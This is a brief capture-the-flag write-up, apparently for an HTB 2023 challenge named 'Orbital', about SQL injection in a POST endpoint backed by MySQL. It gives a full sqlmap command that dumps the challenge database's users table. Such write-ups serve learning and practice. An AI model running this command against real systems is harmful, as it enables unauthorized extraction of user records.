Orbital
Personal Rating: Easy
We have a website where we can send a POST request to an endpoint. The input is used in MySQL SQL commands. You should have found the proper SQL injection command manually, but I must admit that I used sqlmap. Shame on me.
sqlmap -r HTB-CTF-2023/Orbital/orbitalrequest --level 5 --risk 2 --dbms=mysql -D orbital -T users --dump
Last updated